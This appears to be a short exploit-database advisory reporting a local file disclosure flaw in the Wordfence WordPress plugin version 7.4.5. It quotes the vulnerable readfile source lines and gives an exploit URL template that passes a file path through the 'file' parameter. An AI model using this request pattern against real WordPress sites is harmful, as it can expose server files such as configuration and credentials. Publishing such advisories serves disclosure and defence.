Wordpress Plugin wordfence.7.4.5 - Local File Disclosure

2020.02.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure [-] Author: mehran feizi [-] Category: webapps [-] Date: 2020.02.12 ============================================================================== Vulnerable Source: 5662: readfile readfile($localFile); 5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file'])); ================================================================================= Exploit: localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD] ================================================================================= contact me: telegram: @MF0584 gmail: mehranfeizi13841384@gmail.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top